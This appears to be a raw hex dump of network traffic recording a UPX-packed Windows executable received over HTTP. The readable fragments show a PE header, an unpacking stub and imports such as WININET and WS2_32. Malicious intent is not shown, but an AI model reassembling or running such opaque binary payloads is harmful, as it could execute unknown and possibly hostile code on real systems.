1dac 709c 9718 153b 8514 d854 3747 7551    ..p....;...T7GuQ
2406 2102 02b0 01bc fba1 d42a 33c9 33d2    $.!........*3.3.
8e0c 40d3 740b e61c 0710 2014 e6cc 501d    ..@.t..... ...P.
9abf 7d4a 046b 60d7 7416 2030 0328 660e    ..}J.k`.t. 0.(f.
245b aac9 7507 7535 a998 83e7 ccfd dcdb    $[..u.u5........
3347 750d a383 c8ff a69c c36a c05f 53d3    3Gu........j._S.
1adc 66f8 0e3b 0ceb 045b 959a 3ec0 4e0c    ..f..;...[..>.N.
3101 7c5f 0231 80cd 1582 25d8 3f30 ecd6    1.|_.1....%.?0..
a2fb 6f41 0bc0 40a0 a954 0392 6aa1 4cd0    ..oA..@..T..j.L.
4a43 d01a 8ff8 1e5a e869 b643 c267 8b26    JC.....Z.i.C.g.&
52e4 11a7 c720 3032 249d 70e8 8515 b555    R.... 02$.p....U
3c8c 4892 fb8b ac24 b428 3f7b 3b4c aac7    <.H....$.(?{;L..
6a50 e327 9093 b1a2 d153 caca bfca 923c    jP.'.....S.....<
0056 2e8b bc24 a8e4 9602 7373 305f f855    .V...$....ss0_.U
2836 b003 502f 289b 70d5 1138 99b9 9d8c    (6..P/(.p..8....
f7f9 9835 2610 34df 4060 81ec 4506 5678    ...5&.4.@`..E.Vx
480b c808 c414 7b0a b898 3b65 a79c 4868    H.....{...;e..Hh
d85f 4d53 bcbd 1368 c079 5268 b055 872f    ._MS...h.yRh.U./
a0b9 e5a4 0478 0b63 b20e 904b 769b 4853    .....x.c...Kv.HS
ac4f b821 97d0 4614 ac1a 6489 ec42 70ac    .O.!..F...d..Bp.
04cc 301a 4660 2f6b 2ea5 cc9d 490e 40ac    ..0.F`/k....I.@.
701e 965c 812e 6441 54dc 4917 4233 b055    p..\..dAT.I.B3.U
34a2 5542 102c bf35 d113 c5df e284 2e60    4.UB.,.5.......`
4186 249a 6d2c e992 0919 8ccd 78cd 5066    A.$.m,......x.Pf
ba46 162e 0fa4 0e73 e581 ba2e 50cb 9c42    .F.....s....P..B
0636 aca0 fb51 6848 3e52 d1bc 8199 2b63    .6...QhH>R....+c
3c38 8a0f 9bb5 6252 5843 0868 1892 4bc1    <8....bRXC.h..K.
3055 3c24 55e8 6751 6c01 d434 5bfc 0498    0U<$U.gQl..4[...
5531 c776 5b1e c95c 5fc0 d715 559e a097    U1.v[..\_...U...
53eb 3bff 52f0 0ce1 bcff ff76 2e8d 9600    S.;.R......v....
2881 6ffd 6d1a b804 3bd7 76b3 c72b c66a    (.o.m...;.v..+.j
99bd fbfd 14aa 8d0c 0634 03f0 3604 3bf7    .........4..6.;.
7281 db0a 2d17 f89e 2c05 005c cc14 5d6a    r...-...,..\..]j
07ed 12da 9ace 74c3 0f3a ac64 b085 d8e0    ......t..:.d....
9aa6 8185 c71b 782d e041 2e04 2fd1 82bc    ......x-.A../...
07c1 985b a053 37c8 0d9c 22f6 ae75 cf0b    ...[.S7..."..u..
3e72 c935 3902 0107 6a28 60c1 3a76 56be    >r.59...j(`.:vV.
7fde ef67 b705 37dd 5d61 1d19 8b0f f6c1    ...g..7.]a......
4b02 0183 4cb4 8465 3a0c 22c9 337f 20c5    K...L..e:.".3. .
2804 116b 9f80 58e8 be4f 931c 5112 5213    (..k..X..O..Q.R.
1c31 5252 31c7 2b31 4731 a620 2e81 f854    .1RR1.+1G1. ...T
57b9 1105 6660 a4a0 59dc 4489 4c04 bd02    W...f`..Y.D.L...
75a6 460b 0cf0 00b7 c8d0 d70a 2c53 7c2e    u.F.........,S|.
263c 4441 838b 2236 bf28 5c6d d04f 675f    &<DA.."6.(\m.Og_
742e 5c5c 665f b444 a7c6 b027 0c68 ca81    t.\\f_.D...'.h..
2970 1c5a e8e0 eaa3 3a67 52b1 04ee c933    )p.Z....:gR....3
ea52 5354 c33f 2c23 b688 2722 bae8 8550    .RST.?,#..'"...P
0193 8843 4ccc 3811 ad68 1c22 89b3 d09e    ...CL.8..h."....
7b72 f824 2da3 41b8 6c14 85d7 2dec 540c    {r.$-.A.l...-.T.
1e11 af8d 8c1d d349 3fc8 c09d 7b43 0a09    .......I?...{C..
4068 7cea ab52 10d9 1b78 5a4f cc74 a660    @h|..R...xZO.t.`
9980 55fc 1d1b 88a7 6b52 e604 7072 6868    ..U.....kR..prhh
90cb a572 05b2 f807 3056 8b30 871c 0008    ...r....0V.0....
1c31 a352 ddf7 0049 3fec 2d51 8ddf 62d5    .1.R...I?.-Q..b.
4881 1f24 0973 41aa f790 626b 5776 d62d    H..$.sA...bkWv.-
ecfb 6a04                                  ..j.

Data received:

    
67c1 2f8f 88ff 8785 0025 442c 33cb 26d0    g./......%D,3.&.
11b4 834b 931a dfbf d901 1950 9c3f 7c65    ...K.......P.?|e
d623 0b86 649c eb6c 772d 669b c2b5 fded    .#..d..lw-f.....
6d2d 636e 2f78 2d77 7747 63c8 eb3f 2c39    m-cn/x-wwGc..?,9
7f8e 7057 2d74 7970 653a d3b8 31c3 10b3    ..pW-type:..1...
432b 325f a5b3 5c43 c8bc 9f65 f77d b5a5    C+2_..\C...e.}..
6f09 7835 3635 2933 a82f 6cdf e36d f767    o.x565)3./l..m.g
7438 2d4c 0467 7468 0c43 00bc d6d8 1e2a    t8-L.gth.C.....*
0c63 b934 0fa3 756c 68e9 ae55 73ef 6951    .c.4..ulh..Us.iQ
f156 ebff ad64 0376 3a31 2e39 2e30 2e31    .V...d.v:1.9.0.1
2920 305f 6bb4 6eff 6f2f 3230 3034 3004    ) 0_k.n.o/20040.
3120 3636 b19a fba1 7b78 2f33 1d34 f72d    1 66....{x/3.4.-
4167 624e 6074 ffb6 557a 8761 2f35 2e26    AgbN`t..Uz.a/5.&
28d4 6def dcf6 3b20 5502 57d0 0b20 4e54    (.m...; U.W.. NT
201c 31d7 b66d b90f 2072 2f60 309e 4882     .1..m.. r/`0.H.
3ace 7a7f 0a6f 4854 5450 0763 7336 fd7a    :.z..oHTTP.cs6.z
bc5f f86c 7232 5b66 6bab b5f6 b6d7 3613    ._.lr2[fk.....6.
f908 0129 d6f5 7e7d 2e74 6d70 574d 2015    ...)..~}.tmpWM .
150a b739 b7bd f020 0a20 5e6c 2022 0922    ...9... . ^l "."
0a0f dc01 fb8f 0967 6f74 6f20 565a 381d    .......goto VZ8.
003a 0f82 d596 fe77 6966 203e 6985 db0e    .:.....wif >i...
740b 05c5 4137 5e33 40b6 f630 9267 8a5f    t...A7^3@..0.g._
d7fe 4002 4a26 293f 0143 1160 a103 5c80    ..@.J&)?.C.`..\.
062c 9701 1430 01a8 dbbe d547 1074 5072    .,...0.....G.tPr
6f9f 7373 4964 1446 0f0b 03de 7f65 4c69    o.ssId.F.....eLi
6272 6172 7921 ca76 fb57 b641 1353 0d41    brary!.v.W.A.S.A
7474 7226 7574 366d ab8f ba13 43e8 48e4    ttr&ut6m....C.H.
6417 b360 b172 0cf5 5230 58a9 b6d0 4c61    d..`.r..R0X...La
fe45 6986 74ee 05f6 0212 2054 6849 461b    .Ei.t..... ThIF.
0573 9228 954e 47ed 5d03 da74 0e11 6945    .s.(.NG.]..t..iE
6e76 6917 af94 6b80 6ef4 5389 7d6a 01fe    nvi...k.n.S.}j..
c0da 4f70 0e56 566f 6c75 6d80 c35e f055    ..Op.VVolum..^.U
0061 049e abdb 46db 546f 1a68 a970 5453    .a....F.To.h.pTS
6e07 1b6b ad7b 7368 6f58 440f 32ea 413d    n..k.{shoXD.2.A=
936d 1b1d 5465 fe50 2b68 344d 6a90 9a75    .m..Te.P+h4Mj..u
ee78 1b7c 44af 5ab7 6dab 6374 5d79 156c    .x.|D.Z.m.ct]y.l
c271 d5de 6d73 0927 6c6c 4279 6527 db0a    .q..ms.'llBye'..
772f 0f43 6861 d757 6169 3829 53aa b5d6    w/.Cha.Wai8)S...
dc9b 254f 626a 3714 6298 c1db 2da1 102e    ..%Obj7.b...-...
3b6f 7682 86cd 5a7b 3433 d890 814b 7625    ;ov...Z{43...Kv%
cc9c 9757 7e09 bc64 6d98 737d 8832 0676    ...W~..dm.s}.2.v
7833 2713 7475 700e 4320 1476 13b7 114c    x3'.tup.C .v...L
6f6d fa25 bc7f b31f 9441 6464 7298 979a    om.%.....Addr...
ab81 3049 99b3 7ea7 d9b8 19ea 4765 7061    ..0I..~.....Gepa
6900 84b6 cd0e 8f2d 8b6b 0aa0 d19a 9b25    i......-.k.....%
1174 0793 b733 6208 407b 0176 6a75 b34d    .t...3b.@{.vju.M
166b 5123 1b73 5976 0b6a dd4f a83f 5f58    .kQ#.sYv.j.O.?_X
ec40 22a6 d0b6 ff7e 5941 5858 5a12 4340    .@"....~YAXXZ.C@
3f31 3f06 4ed4 c7f8 c6ed 0c0c 2462 5669    ?1?.N.......$bVi
635f 731f 4044 d69a 1bb6 5510 638a 5f74    c_s.@D....U.c._t
7273 0f3d 67d8 b676 5615 736c 9261 c613    rs.=g..vV.sl.a..
7ddf fe6c 3240 1643 4150 4244 5640 3444    }..l2@.CAPBDV@4D
425a 47b6 7d51 b6b4 7750 4141 4599 4902    BZG.}Q..wPAAE.I.
7250 e6de 40aa a74b 5154 d9c2 d940 f254    rP..@..KQT...@.T
eb79 9701 40fe de58 954d 436f 70e1 d32c    .y..@..X.MCop..,
b449 4ca9 82c4 5f5f b9b8 5247 6974 7de5    .IL...__..RGit}.
72a3 0ef9 1cad 525d 3af6 1973 6633 b942    r.....R]:..sf3.B
e50b 6411 72da 5778 8461 f65f 6664 f21f    ..d.r.Wx.a._fd..
7002 8295 6023 386d d02d 8473 40db 2070    p...`#8m.-.s@. p
1324 0ffb 6c8f 2393 5f68 be3d 3363 6d0a    .$..l.#._h.=3cm.
b9d7 0d47 531b 6370 a466 3220 428b 2770    ...GS.cp.f2 B.'p
725c a975 37e1 5540 5443 7878 f241 dbee    r\.u7.U@TCxx.A..
6e92 052f 7377 70f7 7466 0977 2d21 62db    n../swp.tf.w-!b.
6373 5070 3aff 30b6 e39b 3a15 3279 5041    csPp:.0...:.2yPA
ee01 a583 81d6 2c6e 7432 3655 07cb 3576    ......,nt26U..5v
355f 62b2 47c3 6670 db16 625b 3b73 262f    5_b.G.fp..b[;s&/
6b07 6105 bdf7 6665 6999 3a67 0882 d66d    k.a...fei.:g...m
ce02 2be8 6523 66be 0de6 22dc 7e01 6d66    ..+.e#f...".~.mf
0e48 77f7 6281 7b13 075c 1605 b552 1c36    .Hw.b.{..\...R.6
9a6d 1272 407d 91ee 6dd8 667e 5669 096c    .m.r@}..m.f~Vi.l
f0f0 daac 3508 9908 5866 0c33 9b9b 56e4    ....5...Xf.3..V.
f66e f570 b360 2a1e a3bf 8df0 3100 d654    .n.p.`*.....1..T
28bf 2243 4c53 4944 86b7 6709 6c6f 0dbb    (."CLSID..g.lo..
106f 49c2 6996 697a 6527 9759 966d d36c    .oI.i.ize'.Y.m.l
ff04 0207 0609 3370 9a6d 023f a484 9d02    ......3p.m.?....
3a70 9aad 4111 b08c 531a 8316 cce2 1521    :p..A...S......!
489f c09b e45c f90c 874b 6579 2681 d374    H....\...Key&..t
34bc 9c73 5402 ed59 0e04 9e53 793e a2b6    4..sT..Y...Sy>..
3083 ef4d 65e8 7398 2875 09d8 ac40 7b41    0..Me.s.(u...@{A
63a1 4831 106d 61d8 b30a 506f 2836 67cf    c.H1.ma...Po(6g.
b5b3 86b5 7513 22de 7317 ecb5 1388 223e    ....u.".s.....">
4f5d 692e 834e b3ad 97c7 c425 e130 c805    O]i..N.....%.0..
5467 d313 5996 85a7 cc34 1602 7317 f284    Tg..Y....4..s...
4618 1025 03c1 5045 81ff 90ff 4c01 0300    F..%..PE....L...
b726 be49 e000 0f01 0b01 063c cded 0e11    .&.I.......<....
a700 703d 0439 3bcf 4e6e 0440 0010 0f04    ..p=.9;.Nn.@....
0007 0c6f b225 1760 007f 8cde c0ce 0c10    ...o.%.`........
0706 3a1b 10b2 bc68 43f0 a226 ae10 a2fc    ..:....hC..&....
b32e 43c8 06db 10f7 922f 9030 98db 46e9    ..C....../.0..F.
59fa 602e 4627 6153 749d b209 930e 036a    Y.`.F'aSt......j
402e 3248 738b 2627 dc06 5050 9658 7e53    @.2Hs.&'..PP.X~S
c013 5446                                  ..TF

Data received:

    
8721 0000 0000 0000 0009 00ff 0000 0000    .!..............
60be 0050 4000 8dbe 00c0 ffff 57eb 0b90    `..P@.......W...
8a06 4688 0747 01db 7507 8b1e 83ee fc11    ..F..G..u.......
db72 edb8 0100 0000 01db 7507 8b1e 83ee    .r........u.....
fc11 db11 c001 db73 ef75 098b 1e83 eefc    .......s.u......
11db 73e4 31c9 83e8 0372 0dc1 e008 8a06    ..s.1....r......
4683 f0ff 7474 89c5 01db 7507 8b1e 83ee    F...tt....u.....
fc11 db11 c901 db75 078b 1e83 eefc 11db    .......u........
11c9 7520 4101 db75 078b 1e83 eefc 11db    ..u A..u........
11c9 01db 73ef 7509 8b1e 83ee fc11 db73    ....s.u........s
e483 c102 81fd 00f3 ffff 83d1 018d 142f    .............../
83fd fc76 0f8a 0242 8807 4749 75f7 e963    ...v...B..GIu..c
ffff ff90 8b02 83c2 0489 0783 c704 83e9    ................
0477 f101 cfe9 4cff ffff 5e89 f7b9 6000    .w....L...^...`.
0000 8a07 472c e83c 0177 f780 3f01 75f2    ....G,.<.w..?.u.
8b07 8a5f 0466 c1e8 08c1 c010 86c4 29f8    ..._.f........).
80eb e801 f089 0783 c705 88d8 e2d9 8dbe    ................
0050 0000 8b07 09c0 7445 8b5f 048d 8430    .P......tE._...0
0070 0000 01f3 5083 c708 ff96 f070 0000    .p....P......p..
958a 0747 08c0 74dc 89f9 7907 0fb7 0747    ...G..t...y....G
5047 b957 48f2 ae55 ff96 f470 0000 09c0    PG.WH..U...p....
7407 8903 83c3 04eb d8ff 9604 7100 008b    t...........q...
aef8 7000 008d be00 f0ff ffbb 0010 0000    ..p.............
5054 6a04 5357 ffd5 8d87 1f02 0000 8020    PTj.SW......... 
7f80 6028 7f58 5054 5053 57ff d558 618d    ..`(.XPTPSW..Xa.
4424 806a 0039 c475 fa83 ec80 e9ff c8ff    D$.j.9.u........
ff00 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 5c81 0000    ............\...
f080 0000 0000 0000 0000 0000 0000 0000    ................
6981 0000 0c81 0000 0000 0000 0000 0000    i...............
0000 0000 7681 0000 1481 0000 0000 0000    ....v...........
0000 0000 0000 0000 8281 0000 1c81 0000    ................
0000 0000 0000 0000 0000 0000 8d81 0000    ................
2481 0000 0000 0000 0000 0000 0000 0000    $...............
9781 0000 2c81 0000 0000 0000 0000 0000    ....,...........
0000 0000 a481 0000 3481 0000 0000 0000    ........4.......
0000 0000 0000 0000 b081 0000 3c81 0000    ............<...
0000 0000 0000 0000 0000 0000 bc81 0000    ................
4481 0000 0000 0000 0000 0000 0000 0000    D...............
c781 0000 4c81 0000 0000 0000 0000 0000    ....L...........
0000 0000 d381 0000 5481 0000 0000 0000    ........T.......
0000 0000 0000 0000 0000 0000 0000 0000    ................
de81 0000 ec81 0000 fc81 0000 0c82 0000    ................
1a82 0000 2882 0000 0000 0000 3682 0000    ....(.......6...
0000 0000 4882 0000 0000 0000 5c82 0000    ....H.......\...
0000 0000 6282 0000 0000 0000 0200 0080    ....b...........
0000 0000 7082 0000 0000 0000 7a82 0000    ....p.......z...
0000 0000 8882 0000 0000 0000 9282 0000    ................
0000 0000 0300 0080 0000 0000 4b45 524e    ............KERN
454c 3332 2e44 4c4c 0041 4456 4150 4933    EL32.DLL.ADVAPI3
322e 646c 6c00 4d53 5643 5036 302e 646c    2.dll.MSVCP60.dl
6c00 4d53 5643 5254 2e64 6c6c 006f 6c65    l.MSVCRT.dll.ole
3332 2e64 6c6c 004f 4c45 4155 5433 322e    32.dll.OLEAUT32.
646c 6c00 5348 454c 4c33 322e 646c 6c00    dll.SHELL32.dll.
5348 4c57 4150 492e 646c 6c00 5553 4552    SHLWAPI.dll.USER
3332 2e64 6c6c 0057 494e 494e 4554 2e64    32.dll.WININET.d
6c6c 0057 5332 5f33 322e 646c 6c00 0000    ll.WS2_32.dll...
4c6f 6164 4c69 6272 6172 7941 0000 4765    LoadLibraryA..Ge
7450 726f 6341 6464 7265 7373 0000 5669    tProcAddress..Vi
7274 7561 6c50 726f 7465 6374 0000 5669    rtualProtect..Vi
7274 7561 6c41 6c6c 6f63 0000 5669 7274    rtualAlloc..Virt
7561 6c46 7265 6500 0000 4578 6974 5072    ualFree...ExitPr
6f63 6573 7300 0000 4f70 656e 5468 7265    ocess...OpenThre
6164 546f 6b65 6e00 0000 3f5f 586c 656e    adToken...?_Xlen
4073 7464 4040 5941 5858 5a00 0000 6174    @std@@YAXXZ...at
6f69 0000 436f 496e 6974 6961 6c69 7a65    oi..CoInitialize
0000 5374 7253 7472 4100 0000 5348 4765    ..StrStrA...SHGe
7456 616c                                  tVal

Data received:

    
2d0c 8bf4 bf76 766b 4901 5756 476a 490e    -....vvkI.WVGjI.
c606 6573 df74 5d84 8bfe 83c9 ff82 4ffa    ..es.t].......O.
73ff ffff f2ae f7d1 2bf9 8bc1 8bf7 8bfa    s.......+.......
c1e9 02f3 a58b c883 e103 f3a4 a01d 767f    ..............v.
ee98 2868 1ccf 2749 6810 098b f15f 309d    ..(h..'Ih...._0.
d946 907b 943f 741c 8b55 1fda d6b9 086a    .F.{.?t..U.....j
2f56 6901 0929 5251 eede 6cdf 6802 f4d0    /Vi..)RQ..l.h...
2598 33d2 b914 f8f7 f152 b27f f7d9 b1a0    %.3......R......
a528 245f 5e8b e55d c36a 0213 980b 01bb    .($_^..].j......
9000 bcd4 00b9 dbff 2da0 1448 c057 8944    ........-..H.W.D
2408 c703 0c64 15ed 9dac d00b 1069 5d8b    $....d.......i].
3d48 63fb b66f ffd7 8d54 2414 6a64 8d1d    =Hc..o...T$.jd..
1452 8d4c 0450 0f51 0a37 c69b 7b84 248c    .R.L.P.Q.7..{.$.
2718 5068 c003 482d dd5c 1730 3e38 8b5c    '.Ph..H-.\.0>8.\
8281 c4c2 c316 ec72 8579 f198 448b b3bb    .......r.y..D...
427b 8946 7c49 00c7 4604 06e3 df85 9f0c    B{.F|I..F.......
c646 1019 c65e 3283 ec08 536a b3ed 4e58    .F...^2...Sj..NX
348b f88a 0c50 0fb4 ffed ed76 8b06 8b92    4....P.....v....
0c8d 0d3b ca8b 9610 7c34 8b5e 0455 8d70    ...;....|4.^.U.p
f7ff b76b 0ed5 5d7c 2840 3bc8 7f23 433b    ...k..]|(@;..#C;
d37f 1e89 188b 4e8e 6f7f bb58 0440 0280    ......N.o..X.@..
8d14 813b fa97 5b0f 9fc0 b398 bdfd b7c2    ...;..[.........
7989 7e08 890e 8956 0413 32c0 5b12 8d3b    y.~....V..2.[..;
0a43 2f82 0402 6c84 d8e3 301e e195 c0c3    .C/...l...0.....
3f00 0800 7857 2bdd 6ef7 7124 0472 aa91    ?...xW+.n.q$.r..
0450 2904 5ca0 8d82 a3dd b58c 0cce 68ff    .P).\.........h.
0304 2d90 ddc8 d6ce 1c9d 1884 52bb 4c76    ..-.........R.Lv
2e3c 4930 94c0 5f21 0008 5f90 43be 4755    .<I0.._!.._.C.GU
5661 0c0c ecd3 2939 0c8b 2d85 8d94 1af7    Va....)9..-.....
ef85 d39c 82d5 8bf0 65f6 0f84 8e51 b7b7    ........e....Q..
867b 538b 1d28 2223 3256 ffd3 0215 2c2c    .{S..("#2V....,,
5bc1 7c0d 0053 0f57 308d 6cdb cd0b d857    [.|..S.W0.l....W
f553 a234 30f7 75ae d478 10b5 3db5 20c8    .S.40.u..x..=. .
4c0f cefe 345d c45d 51e8 ed74 1555 3238    L...4].]Q..t.U28
bd6e 646b 5539 3c14 1040 506c 3314 8610    .ndkU9<..@Pl3...
7ea1 7c52 4718 b66c e15b 6d5d f800 f6fa    ~.|RG..l.[m]....
9e6e a804 68e0 f8dc 04c8 223f dd96 dcc8    .n..h....."?....
6010 285c c730 4240 3b3e 3892 334f 14ac    `.(\.0B@;>8.3O..
f66a 0174 111a 8fdd 0956 0c2c fe24 3ec5    .j.t.....V.,.$>.
3ace 18d8 c701 2d4f 55fe a0d6 68dc 6e57    :.....-OU...h.nW
33ed b589 6ccc b595 77eb cca6 0418 040b    3...l...w.......
0103 68fc 78a4 eec2 249a 1a68 e40c 57a1    ..h.x...$..h..W.
df6e bcd3 00c6 ff6a 32e9 d057 8ad8 6bee    .n.....j2..W..k.
cf6c 1718 3484 db74 de07 8bb4 c208 bf10    .l..4..t........
1074 05bd 01c4 5f1f e899 dafb 703d 58c3    .t...._.....p=X.
7f12 68bb 2643 3b6c a4d3 f212 7b00 107b    ..h.&C;l....{..{
efe7 1efe 1334 eb08 1109 6e26 3cb4 9b5a    .....4....n&<..Z
0851 6be4 c445 4067 1a92 cfa4 32d2 57c5    .Qk..E@g....2.W.
18c2 870c bc24 b4ff 38c9 219b 9717 b800    .....$..8.!.....
3c51 1849 20f6 8d60 5883 cdff 12c7 166e    <Q.I ..`X......n
b702 1496 8974 c575 66f9 1a72 df78 bcea    .....t.uf..r.x..
184a b99f 8601 321d b621 d6f3 2d65 b90f    .J....2..!..-e..
4314 b33a 9ea3 12dd 799b b44c b35d 83e3    C..:....y..L.]..
40b8 789f 2d50 ce14 3c14 b7d9 76db 4489    @.x.-P..<...v.D.
d248 074c 8917 2428 6395 8480 d9ca 2804    .H.L..$(c.....(.
200e 08fc b5fb 8b9c 24bc dd8b d07b 8bfb     .......$....{..
5041 616d 9cc0 6a3e 515d d2ec 1a23 5bdd    PAam..j>Q]...#[.
8b52 8b94 40bc 5186 8624 3737 1851 6434    .R..@.Q..$77.Qd4
4674 4d8e d620 68b3 b31e cc20 56dd 0e73    FtM.. h.... V..s
2bbe 24bc 5630 227c 233c 67e9 be6d ce2c    +.$.V0"|#<g..m.,
f476 6868 0c3a 5624 a3b0 fd8f f8de ff74    .vhh.:V$.......t
5383 c704 6b68 8706 6d37 4418 2023 b875    S...kh..m7D. #.u
3b8b ebc0 38cf 36c9 a00e 3364 d8d2 37fe    ;...8.6...3d..7.
da09 1f8e 532b d718 03d6 5257 1a56 d748    ....S+....RW.V.H
7253 7962 40cf 7828 350d c509 5b0a c8c3    rSyb@.x(5...[...
1d4d 9bdb 1f28 ec80 5096 2817 140d 7382    .M...(..P.(...s.
3b3d 1400 bb6d b8d1 9934 7d2f 693d f060    ;=...m...4}/i=.`
7407 b6b6 bb6c b55e 28c3 e504 5135 2d30    t....l.^(...Q5-0
e192 cd4e 0427 1e90 ee74 89d3 570c 454c    ...N.'...t..W.EL
51fa 6170 a6c7 c824 0208 dc44 4430 020f    Q.ap...$...DD0..
34a2 b851 f610 3394 b3ce 284a 0c72 1d6b    4..Q..3...(J.r.k
b198 7bb9 6ef0 ec24 1242 0660 67bb cb2e    ..{.n..$.B.`g...
8f14 0575 1afa 0452 216a c088 9db0 0522    ...u...R!j....."
b001 06bf 0d8d 36f2 3009 c672 4c8c 0771    ......6.0..rL..q
b825 e35c 6878 0768 6860 8ed4 6a98 d18b    .%.\hx.hh`..j...
1812 1602 756e f7a3 f0e5 f869 1650 53c3    ....un.....i.PS.
1c28 d470 1f0d 7c14 f250 84e7 57a7 20d2    .(.p..|..P..W. .
ddd0 4fe4 ff0f 1f4c 4474 bab0 7907 8383    ..O....LDt..y...
fed3 7eb9 60e3 46c9 8d17 4008 a4c0 7441    ..~.`.F...@...tA
1d16 8116 ae40 c14a a5dd c77b 8edb d54e    .....@.J...{...N
7e2c 5321 14dc 8b40 73dd 4420 50ff 516c    ~,S!...@s.D P.Ql
1a7b 8f09 ddeb 50cb 386a 3210 3839 7644    .{....P.8j2.89vD
092d 4001 24ef e8bb 61f7 7605 e913 015c    .-@.$...a.v....\
1852 53b2 ec93 f0b6 7d34 4eff 008b e414    .RS.....}4N.....
5f53 5818 38c4 3034 8a14 1b24 9c5c bc47    _SX.8.04...$.\.G
35b8 985f e997 f3a0 3bd9 6e5c 32db 71a0    5.._....;.n\2.q.
b819 50eb 4ee8 773b 1f01 bc83 5083 c43c    ..P.N.w;....P..<
eb06 b950 4740 5214 b454 cff0 d26c ed3c    ...PG@R..T...l.<
1116 3452 b987 1361 f0de 830c 9411 00d6    ..4R...a........
3377 0bd7 9ddd 30c7 9411 1fcc 18c9 29d6    3w....0.......).
ee3c 2852 78cc 5fba e07c a5c2 e900 9939    .<(Rx._..|.....9
ca5b 18f1                                  .[..

Data received:

    
48b3 c95e 2adc 500f 86b0 8748 b333 ee92    H..^*.P....H.3..
8811 0c1a 15f8 f87d 7190 1208 5267 522e    .......}q...RgR.
eb9a 2cb0 312b f614 2d1c 3b66 6b38 b384    ..,.1+..-.;fk8..
684a 9e19 08b1 0cb1 af89 14f8 8b79 14ed    hJ...........y..
1add ed83 f901 62d7 0526 6ceb 198b fd63    ......b..&l....c
b1f6 8f16 807c 29ff 0d75 100d 2c12 88e3    .....|)..u..,...
1834 9644 68a4 ae84 411c 3c36 e40e 343a    .4.Dh...A.<6..4:
da46 68c7 2b1f bc66 74f9 e604 1fe5 72fb    .Fh.+..ft.....r.
667c 55c6 4500 7703 0169 0264 64ab 95cb    f|U.E.w..i.dd...
0374 0468 196e 54fe ffff e914 d4fd 8a10    .t.h.nT.........
8a1f 8aca 3ad3 751e 84c9 7416 8a50 018a    ....:.u...t..P..
5f01 b7ad 8dc6 0f0e 5b02 5002 1575 dc74    _.......[.P..u.t
3568 6f8c eb05 1bbd 43e9 aca7 076b 3245    5ho.....C....k2E
6225 a5c7 4334 98d0 63a3 60d6 b20d 12b3    b%..C4..c.`.....
9ed8 8235 1a8b 94f4 e44d 664b 164a 9f5f    ...5.....MfK.J._
c028 36bb dd1d 6228 6851 052d 6504 2e69    .(6...b(hQ.-e..i
2f67 2cac d96c 3068 3174 32ae a779 730d    /g,..l0h1t2..ys.
c128 b0ae 1775 1c14 9764 c06e 0c57 01ac    .(...u...d.n.W..
e0a5 5c72 8b51 23f7 a338 0401 97db c385    ..\r.Q#..8......
3828 6903 016e 0274 72b9 5c2e 0365 0472    8(i..n.tr.\..e.r
0576 0661 26bc b0e5 076c 0885 5550 8c53    .v.a&....l..UP.S
c84b 1606 7430 0330 ee81 34cd 8b4c ec51    .K..t0.0..4..L.Q
85a3 3176 113a 62a0 9e94 583d 8d5a 67e9    ..1v.:b...X=.Zg.
ed37 00f9 83ff fd89 ea20 7606 35a8 de5e    .7....... v.5..^
6885 4bd6 eda6 41ff 8472 183c ffdb ed2f    h.K...A..r.<.../
d0f8 ed75 36fe c857 8811 8bcb 23b8 4856    ...u6..W....#.HV
ea36 eb58 130c 690f 65ff 5637 6a43 0c44    .6.X..i.e.V7jC.D
1f77 043b c773 1317 c6a7 b1df 5708 bc40    .w.;.s......W..@
cc20 cb8b 7b05 e722 67f5 c88b d108 ca6f    . ..{.."g......o
19d9 0cb4 b7b9 08c6 04fb 26bd e877 4b26    ..........&..wK&
a452 b7b6 8bd9 83b7 ed2c d9fb fdaf cd33    .R.......,.....3
9c4a 7dcf 7477 e59b b329 b822 1e3b df75    .J}.tw...).".;.u
10b7 897a 04fe 1cbc 6c02 080c eb71 9e2e    ...z....l....q..
53eb 351e ac05 eb1d 110d b1c7 528b 426d    S.5.........R.Bm
b6c0 41c3 73b2 b41c ce16 f9be 93ce 5308    ..A.s.........S.
bc73 84d1 f65f 483e cb8b 7804 ce58 088b    .s..._H>..x..X..
4004 d1d2 c4b3 c403 c7e0 d87c 55cf 613b    @..........|U.a;
084d 5551 de14 a821 25b8 3830 9e34 03b2    .MUQ...!%.80.4..
5060 f198 9e74 5386 3bfe 8d04 013b d074    P`...tS.;....;.t
208a 4aff 9519 80f9 a1b2 2cdb cd3b f0c9     .J.......,..;..
884a e843 4343 2639 10dc 5413 a144 c6c2    .J.CCC&9..T..D..
02e4 4056 9d48 d370 3601 f05c a1d0 5368    ..@V.H.p6..\..Sh
7e54 0849 6508 4c84 637d 9a0d eff3 3dc8    ~T.Ie.L.c}....=.
51c9 f4aa 8311 9a00 c0d7 d73c fc23 7042    Q..........<.#pB
783b 5303 8a00 05b8 46a7 534d ae51 c406    x;S.....F.SM.Q..
44ac 4ee7 3ec6 8404 bc14 0fa0 f4cd 2f3e    D.N.>........./>
b756 2d50 e1c0 01b0 663e 0323 d71e 4801    .V-P....f>.#..H.
3381 1c09 cc50 95a0 515f 3cbb a5d4 5040    3....P..Q_<...P@
